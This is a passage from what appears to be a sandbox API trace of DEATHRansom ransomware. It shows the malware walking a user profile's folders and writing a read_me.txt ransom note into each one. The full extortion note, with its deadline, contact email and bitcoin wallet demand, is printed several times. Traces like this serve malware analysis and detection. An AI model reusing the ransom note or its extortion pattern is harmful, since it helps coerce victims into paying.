HALPmcxz\\Videos\\TH6GzmM-ZW3Ji4-yJ8oY\\zDjjTVAKMpLv7DfG3hqV\\Hxr9d4o_z0PsvLg\\*", lpFindFileData=0x17d718 | out: lpFindFileData=0x17d718*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x76612340, ftCreationTime.dwHighDateTime=0x1d4c722, ftLastAccessTime.dwLowDateTime=0x761b4840, ftLastAccessTime.dwHighDateTime=0x1d4cb62, ftLastWriteTime.dwLowDateTime=0x761b4840, ftLastWriteTime.dwHighDateTime=0x1d4cb62, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2738 [0074.822] lstrcpyW (in: lpString1=0x8c33080, lpString2="\\\\?\\C:\\Users\\Default" | out: lpString1="\\\\?\\C:\\Users\\Default") returned="\\\\?\\C:\\Users\\Default" [0074.822] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 91 [0074.822] QueueUserWorkItem (Function=0x40a710, Context=0x8c33080, Flags=0x0) returned 1 [0074.822] GetProcessHeap () returned 0x280000 [0074.823] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8c53090 [0074.823] wnsprintfW (in: pszDest=0x8c53090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\*") returned 22 [0074.823] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0074.824] lstrcpyW (in: lpString1=0x8c730a0, lpString2="\\\\?\\C:\\Users\\Default\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\Default\\Application Data") returned="\\\\?\\C:\\Users\\Default\\Application Data" [0074.824] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 92 [0074.824] QueueUserWorkItem (Function=0x40a710, Context=0x8c730a0, Flags=0x0) returned 1 [0074.824] GetProcessHeap () returned 0x280000 [0074.824] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ab00b8 [0074.825] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Application Data\\*") returned 39 [0074.825] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Application Data\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x13, ftCreationTime.dwHighDateTime=0x2, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="th6gzmm-zw3ji4-yj8oy", cAlternateFileName="\x07")) returned 0xffffffff [0074.825] wnsprintfW (in: pszDest=0x8ab00b8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Application Data\\read_me.txt") returned 49 [0074.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Application Data\\read_me.txt" (normalized: "c:\\users\\default\\application data\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7bc [0074.865] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0074.865] WriteFile (in: hFile=0x7bc, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0074.866] CloseHandle (hObject=0x7bc) returned 1 [0074.866] GetProcessHeap () returned 0x280000 [0074.866] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ab00b8 | out: hHeap=0x280000) returned 1 [0074.866] lstrcpyW (in: lpString1=0x8ab00b8, lpString2="\\\\?\\C:\\Users\\Default\\Contacts" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts") returned="\\\\?\\C:\\Users\\Default\\Contacts" [0074.866] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 93 [0074.866] QueueUserWorkItem (Function=0x40a710, Context=0x8ab00b8, Flags=0x0) returned 1 [0074.866] GetProcessHeap () returned 0x280000 [0074.866] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a800a0 [0074.866] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\*") returned 31 [0074.866] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0074.925] lstrcpyW (in: lpString1=0x8a800a0, lpString2="\\\\?\\C:\\Users\\Default\\Cookies" | out: lpString1="\\\\?\\C:\\Users\\Default\\Cookies") returned="\\\\?\\C:\\Users\\Default\\Cookies" [0074.925] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 94 [0074.925] QueueUserWorkItem (Function=0x40a710, Context=0x8a800a0, Flags=0x0) returned 1 [0074.925] GetProcessHeap () returned 0x280000 [0074.925] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b60028 [0074.925] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Cookies\\*") returned 30 [0074.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Cookies\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="廠疙ᣜ?\x17甴\x17a")) returned 0xffffffff [0074.925] wnsprintfW (in: pszDest=0x8b60028, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Cookies\\read_me.txt") returned 40 [0074.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Cookies\\read_me.txt" (normalized: "c:\\users\\default\\cookies\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x788 [0075.123] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.123] WriteFile (in: hFile=0x788, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.124] CloseHandle (hObject=0x788) returned 1 [0075.124] GetProcessHeap () returned 0x280000 [0075.124] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b60028 | out: hHeap=0x280000) returned 1 [0075.124] lstrcpyW (in: lpString1=0x8b60028, lpString2="\\\\?\\C:\\Users\\Default\\Desktop" | out: lpString1="\\\\?\\C:\\Users\\Default\\Desktop") returned="\\\\?\\C:\\Users\\Default\\Desktop" [0075.124] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 95 [0075.124] QueueUserWorkItem (Function=0x40a710, Context=0x8b60028, Flags=0x0) returned 1 [0075.124] GetProcessHeap () returned 0x280000 [0075.124] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8cb30c0 [0075.125] wnsprintfW (in: pszDest=0x8cb30c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\*") returned 30 [0075.125] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0075.127] lstrcpyW (in: lpString1=0x8cb30c0, lpString2="\\\\?\\C:\\Users\\Default\\Documents" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents") returned="\\\\?\\C:\\Users\\Default\\Documents" [0075.127] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 96 [0075.127] QueueUserWorkItem (Function=0x40a710, Context=0x8cb30c0, Flags=0x0) returned 1 [0075.127] GetProcessHeap () returned 0x280000 [0075.127] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b80038 [0075.128] wnsprintfW (in: pszDest=0x8b80038, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\*") returned 32 [0075.128] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0075.129] lstrcpyW (in: lpString1=0x8cf30e0, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\My Music" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Music") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Music" [0075.130] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 97 [0075.130] QueueUserWorkItem (Function=0x40a710, Context=0x8cf30e0, Flags=0x0) returned 1 [0075.130] GetProcessHeap () returned 0x280000 [0075.130] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8d030e8 [0075.131] wnsprintfW (in: pszDest=0x8d030e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*") returned 41 [0075.131] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x11, ftCreationTime.dwHighDateTime=0x2, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zdjjtvakmplv7d眕豿眵\x17Ǭ(", cAlternateFileName="廠疙ᣜ??\x17甴?\x17a")) returned 0xffffffff [0075.131] wnsprintfW (in: pszDest=0x8d030e8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\read_me.txt") returned 51 [0075.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\read_me.txt" (normalized: "c:\\users\\default\\documents\\my music\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x77c [0075.224] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.224] WriteFile (in: hFile=0x77c, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17de6c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17de6c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.225] CloseHandle (hObject=0x77c) returned 1 [0075.225] GetProcessHeap () returned 0x280000 [0075.225] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8d030e8 | out: hHeap=0x280000) returned 1 [0075.225] lstrcpyW (in: lpString1=0x8d030e8, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures" [0075.225] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 98 [0075.225] QueueUserWorkItem (Function=0x40a710, Context=0x8d030e8, Flags=0x0) returned 1 [0075.225] GetProcessHeap () returned 0x280000 [0075.225] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ba0130 [0075.226] wnsprintfW (in: pszDest=0x8ba0130, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*") returned 44 [0075.227] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x11, ftCreationTime.dwHighDateTime=0x2, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zdjjtvakmplv7d眕豿眵\x17Ǭ(", cAlternateFileName="廠疙ᣜ??\x17甴?\x17a")) returned 0xffffffff [0075.227] wnsprintfW (in: pszDest=0x8ba0130, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\read_me.txt") returned 54 [0075.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\read_me.txt" (normalized: "c:\\users\\default\\documents\\my pictures\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x77c [0075.227] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.227] WriteFile (in: hFile=0x77c, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17de6c, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17de6c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.228] CloseHandle (hObject=0x77c) returned 1 [0075.228] GetProcessHeap () returned 0x280000 [0075.228] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ba0130 | out: hHeap=0x280000) returned 1 [0075.228] lstrcpyW (in: lpString1=0x8ba0130, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\My Videos" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Videos" [0075.228] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 99 [0075.228] QueueUserWorkItem (Function=0x40a710, Context=0x8ba0130, Flags=0x0) returned 1 [0075.228] GetProcessHeap () returned 0x280000 [0075.228] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8bb0138 [0075.229] wnsprintfW (in: pszDest=0x8bb0138, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*") returned 42 [0075.229] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x11, ftCreationTime.dwHighDateTime=0x2, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zdjjtvakmplv7d眕豿眵\x17Ǭ(", cAlternateFileName="廠疙ᣜ??\x17甴?\x17a")) returned 0xffffffff [0075.229] wnsprintfW (in: pszDest=0x8bb0138, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\read_me.txt") returned 52 [0075.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\read_me.txt" (normalized: "c:\\users\\default\\documents\\my videos\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c8 [0075.271] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: 